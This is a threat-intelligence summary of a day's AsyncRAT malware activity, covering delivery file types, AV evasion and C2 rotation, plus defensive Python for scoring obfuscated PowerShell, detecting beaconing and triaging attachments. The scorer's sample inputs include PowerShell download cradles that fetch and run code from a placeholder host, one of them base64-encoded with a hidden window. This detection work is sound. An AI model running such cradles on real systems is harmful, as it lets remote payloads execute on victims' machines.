Daily Summary
AsyncRAT activity surged sharply with 48 new samples, 145% above the 7-day average of roughly 20. This spike marks one of the largest single-day increases in recent weeks and is driven primarily by an uptick in executable payloads.
New Samples Detected
Executables (.exe) dominate with 27 samples, over half of today’s total. PowerShell scripts (.ps1) remain a significant secondary vector with 9 samples, while batch files (.bat), compressed archives (.zip, .rar), JavaScript (.js) and a single screen-saver file (.scr) round out the distribution. A .scr file is an ordinary PE executable under a different extension, so its presence points to an attempt to slip past extension-based attachment filters and user suspicion rather than to evade static analysis, which treats the two identically.
Distribution Methods
File type diversity indicates a multi-vector approach. The high counts of .exe and .ps1 files point to phishing attachments and script-based delivery, typically a PowerShell stage that fetches and runs the executable. The .zip and .rar archives are most plausibly wrappers that get the payload past attachment filtering, since many gateways do not inspect compressed content and cannot inspect password-protected archives at all; the .js and .scr entries rely on social engineering, such as a document icon or a double extension that hides the real file type.
Detection Rate
Current AV engine catch rates remain moderate. The use of obfuscated .ps1 and .js files, along with .bat wrappers, indicates that some variants are bypassing signature-based detection: script content that is base64-encoded, concatenated from fragments or assembled from character codes carries no stable signature until it is decoded at runtime. Archived samples (.zip, .rar) cannot be scanned until unpacked, and a password-protected archive cannot be scanned at the gateway at all. Reputation-based controls lag on newly provisioned C2 domains and IPs, which matters given the volume of new infrastructure seen today.
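The obfuscation patterns described above (encoded command lines, string concatenation, char-code assembly) are what a triage script should key on once signatures miss. The following Python is an added example, not tooling from the original report: a small scorer that decodes the -EncodedCommand blob PowerShell would run and weights a few common download-cradle and obfuscation indicators. The sample scripts, the indicator list and its weights are constructed for illustration; example.invalid is a placeholder host.

```python
import base64
import re
from typing import Optional

# The -EncodedCommand family of switches (-e, -ec, -enc, -encodedcommand)
# followed by a base64 blob, which PowerShell decodes as UTF-16LE.
ENC_RE = re.compile(r"-e(?:ncodedcommand|nc|c)?\s+([A-Za-z0-9+/=]{16,})", re.I)

# (name, pattern, weight): cheap obfuscation and download-cradle indicators.
# Weights are illustrative assumptions; tune them against your own sample set.
INDICATORS = [
    ("iex",        re.compile(r"\biex\b|invoke-expression", re.I), 3),
    ("download",   re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b", re.I), 2),
    ("frombase64", re.compile(r"frombase64string", re.I), 2),
    ("char_codes", re.compile(r"\[char\]\s*\d+", re.I), 2),
    ("str_concat", re.compile(r"'[^']{1,4}'\s*\+\s*'"), 2),
    ("call_var",   re.compile(r"&\s*\$\w+"), 2),
    ("hidden",     re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), 2),
    ("noprofile",  re.compile(r"-nop\b|-noprofile\b", re.I), 1),
    ("tick_split", re.compile(r"[A-Za-z]`[A-Za-z]"), 1),
]
SUSPICIOUS_AT = 4


def decode_encoded_command(text: str) -> Optional[str]:
    """Return the decoded -EncodedCommand payload, or None if absent/invalid."""
    m = ENC_RE.search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_script(text: str) -> dict:
    """Score one script or command line; the decoded payload is scored too."""
    decoded = decode_encoded_command(text)
    # Drop the base64 blob so it cannot produce accidental matches, then
    # append the decoded payload so indicators inside it become visible.
    visible = ENC_RE.sub("-enc <blob>", text)
    if decoded is not None:
        visible += "\n" + decoded
    hits = [name for name, rx, _ in INDICATORS if rx.search(visible)]
    score = sum(w for name, _, w in INDICATORS if name in hits)
    if decoded is not None:
        hits.append("encoded_command")
        score += 2
    return {"score": score, "indicators": sorted(hits),
            "decoded": decoded, "suspicious": score >= SUSPICIOUS_AT}


# Constructed samples (not real AsyncRAT loaders): a benign admin one-liner,
# an encoded download cradle, and a string-concatenation/char-code variant.
CRADLE = 'IEX (New-Object Net.WebClient).DownloadString("http://example.invalid/a")'
SAMPLES = {
    "benign.ps1":  "Get-ChildItem C:\\Logs | Where-Object { $_.Length -gt 1MB }",
    "encoded.ps1": "powershell.exe -nop -w hidden -enc "
                   + base64.b64encode(CRADLE.encode("utf-16-le")).decode(),
    "concat.ps1":  "$a='Down'+'loadSt'+'ring'; $c=[char]73+[char]69+[char]88; "
                   "& $c ((New-Object Net.WebClient).$a('http://example.invalid/b'))",
}

if __name__ == "__main__":
    for name, body in SAMPLES.items():
        r = score_script(body)
        print(f"{name:12} score={r['score']:2} suspicious={r['suspicious']} {r['indicators']}")
```

The point of decoding before scoring is that the encoded sample carries every indicator the plain cradle does; a scanner that only looks at the command line as typed sees none of them. Feed the same function the 4104 script block events from PowerShell logging and it scores what actually ran.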
C2 Infrastructure
100 new C2 servers were identified today, a substantial addition indicating active infrastructure rotation. Geographic distribution data is unavailable, but the volume alone suggests rapid provisioning to stay ahead of blocklists, so any indicator list derived from it will go stale quickly. Analysts should hunt for beaconing to these IPs, that is, periodic low-volume connections at a near-fixed interval with near-constant payload sizes, rather than relying on blocklist matches alone.
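As an added example (not part of the original summary), the Python below looks for the beaconing behaviour the paragraph recommends hunting for: periodic connections with near-constant payload size to the same destination. The log format, the timestamps and the addresses (documentation ranges) are constructed; the thresholds are assumptions to tune locally.

```python
import statistics
from collections import defaultdict
from datetime import datetime
from typing import Dict, List, Optional, Tuple

# Constructed outbound-connection log (timestamp, source, destination:port,
# bytes sent); the addresses are documentation ranges, not real C2.
LOG = """\
2024-05-01T08:00:00 10.0.0.5 203.0.113.10:6606 412
2024-05-01T08:01:00 10.0.0.5 203.0.113.10:6606 410
2024-05-01T08:02:01 10.0.0.5 203.0.113.10:6606 415
2024-05-01T08:03:00 10.0.0.5 203.0.113.10:6606 411
2024-05-01T08:04:02 10.0.0.5 203.0.113.10:6606 413
2024-05-01T08:05:00 10.0.0.5 203.0.113.10:6606 410
2024-05-01T08:05:59 10.0.0.5 203.0.113.10:6606 414
2024-05-01T08:00:05 10.0.0.7 198.51.100.20:443 20311
2024-05-01T08:00:10 10.0.0.7 198.51.100.20:443 1444
2024-05-01T08:05:10 10.0.0.7 198.51.100.20:443 98112
2024-05-01T08:05:22 10.0.0.7 198.51.100.20:443 512
2024-05-01T08:06:52 10.0.0.7 198.51.100.20:443 7021
2024-05-01T08:18:32 10.0.0.7 198.51.100.20:443 3400
2024-05-01T08:18:35 10.0.0.7 198.51.100.20:443 640
2024-05-01T08:10:00 10.0.0.9 192.0.2.50:8080 300
2024-05-01T08:11:00 10.0.0.9 192.0.2.50:8080 300
"""

Pair = Tuple[str, str]
Event = Tuple[datetime, int]


def parse_log(text: str) -> Dict[Pair, List[Event]]:
    """Group connection events by (source, destination:port)."""
    conns: Dict[Pair, List[Event]] = defaultdict(list)
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, size = line.split()
        conns[(src, dst)].append((datetime.fromisoformat(ts), int(size)))
    return conns


def beacon_stats(events: List[Event], min_events: int = 6,
                 max_interval_cv: float = 0.25,
                 max_size_cv: float = 0.10) -> Optional[dict]:
    """Periodicity check: low coefficient of variation (stdev/mean) of the
    inter-arrival gaps, and near-constant payload sizes. Thresholds are
    illustrative; implants may add jitter, so the gap bound is kept loose.
    Returns None when there are too few events to judge."""
    events = sorted(events)
    if len(events) < min_events:
        return None
    gaps = [(b[0] - a[0]).total_seconds() for a, b in zip(events, events[1:])]
    sizes = [s for _, s in events]
    mean_gap, mean_size = statistics.mean(gaps), statistics.mean(sizes)
    if mean_gap == 0 or mean_size == 0:
        return None
    interval_cv = statistics.pstdev(gaps) / mean_gap
    size_cv = statistics.pstdev(sizes) / mean_size
    return {
        "count": len(events),
        "median_interval": statistics.median(gaps),
        "interval_cv": round(interval_cv, 3),
        "size_cv": round(size_cv, 3),
        "beaconing": interval_cv <= max_interval_cv and size_cv <= max_size_cv,
    }


def analyze_log(text: str) -> Dict[Pair, dict]:
    """Stats for every (source, destination) pair with enough events."""
    out = {}
    for pair, events in parse_log(text).items():
        stats = beacon_stats(events)
        if stats is not None:
            out[pair] = stats
    return out


def find_beacons(text: str) -> List[Pair]:
    return [pair for pair, s in analyze_log(text).items() if s["beaconing"]]


if __name__ == "__main__":
    for pair, s in analyze_log(LOG).items():
        print(pair, s)
    print("beaconing:", find_beacons(LOG))
```

The two-signal rule matters: interactive browsing to one site can look periodic over short windows, but its payload sizes vary by orders of magnitude, while a check-in loop sends almost the same bytes every time. Pairs with too few events are reported as undecided rather than clean, so a host that has only just started beaconing is not silently discarded.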
7-Day Trend
Today’s 145% surge above the 7-day average breaks a two-week pattern of relatively stable volume, signaling a campaign escalation rather than a one-off event.
Security Analysis
The spike in .ps1 usage (9 samples) alongside .exe files is noteworthy. AsyncRAT operators are increasingly blending script-based loaders with compiled payloads. Because powershell.exe is a signed Microsoft binary that default AppLocker and WDAC rules allow, a PowerShell stage that downloads the executable, or loads it reflectively in memory, sidesteps allowlisting that only governs which executables may run. The first .scr appearance in this week’s data points to reliance on extension-based trust: a .scr is a PE executable, but mail filters and users often treat it as something other than a program. Defensive recommendation: enforce script rules in AppLocker or deploy WDAC so that PowerShell runs in Constrained Language Mode, enable PowerShell script block logging so that obfuscated content is recorded in decoded form, and treat .scr attachments with the same scrutiny as .exe files in email gateways.
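Added example in Python (not from the original report) applying the gateway recommendation above together with the point under New Samples Detected that a .scr is simply a PE: an attachment triage function that decides on the PE header rather than on the file name alone, applies the same policy to .scr as to .exe, and looks inside zip archives. The extension policy lists, the fake PE header and the zip contents are assumptions constructed for the example.

```python
import io
import os
import struct
import zipfile
from typing import List, Tuple

# Assumed gateway policy: extensions Windows executes as a PE image, and
# script extensions that auto-run on double-click. Both groups get .exe-level
# scrutiny; .scr sits in the PE group because that is what it is.
PE_EXTS = {".exe", ".scr", ".com", ".pif", ".cpl", ".dll"}
SCRIPT_EXTS = {".ps1", ".bat", ".cmd", ".js", ".jse", ".vbs", ".vbe", ".wsf", ".hta"}


def is_pe(data: bytes) -> bool:
    """True if the bytes carry a PE header: 'MZ' at offset 0 and the
    'PE\\0\\0' signature at the offset stored in e_lfanew (offset 0x3C),
    whatever the file is called."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def verdict(name: str, data: bytes) -> str:
    ext = os.path.splitext(name)[1].lower()
    if is_pe(data):
        # Content wins over name: a PE called invoice.pdf is the worse case.
        return "block:pe" if ext in PE_EXTS else "block:pe_masquerade"
    if ext in SCRIPT_EXTS:
        return "block:script"
    if ext in PE_EXTS:
        return "block:ext"
    return "allow"


def triage(name: str, data: bytes) -> List[Tuple[str, str]]:
    """Verdicts for an attachment; zip members are inspected individually
    (rar needs an external library, so it is not handled here)."""
    buf = io.BytesIO(data)
    if zipfile.is_zipfile(buf):
        results = []
        with zipfile.ZipFile(buf) as z:
            for info in z.infolist():
                if info.is_dir():
                    continue
                results.extend(triage(f"{name}/{info.filename}", z.read(info)))
        return results
    return [(name, verdict(name, data))]


# --- constructed test artifacts -------------------------------------------

def fake_pe() -> bytes:
    """A minimal PE signature (not a loadable image): MZ stub, e_lfanew set
    to 0x80, 'PE\\0\\0' at 0x80. Enough to exercise the header check."""
    hdr = bytearray(0x100)
    hdr[:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x80)
    hdr[0x80:0x84] = b"PE\0\0"
    return bytes(hdr)


def build_zip(members: List[Tuple[str, bytes]]) -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        for member_name, member_data in members:
            z.writestr(member_name, member_data)
    return buf.getvalue()


JPEG_STUB = b"\xff\xd8\xff\xe0" + b"\0" * 64

if __name__ == "__main__":
    pe = fake_pe()
    samples = [("Invoice_2024.pdf.scr", pe), ("invoice.pdf", pe),
               ("photo.jpg", JPEG_STUB), ("update.bat", b"@echo off"),
               ("docs.zip", build_zip([("Invoice_2024.scr", pe), ("readme.txt", b"hi")]))]
    for name, data in samples:
        for member, v in triage(name, data):
            print(f"{v:20} {member}")
```

Checking the header first is what makes the extension list a policy rather than the whole defence: a renamed PE is caught as masquerading, and a .scr inside a zip gets the same block verdict as a bare .exe. Password-protected archives will not open here, which is a result in itself; a gateway should quarantine what it cannot inspect rather than pass it through.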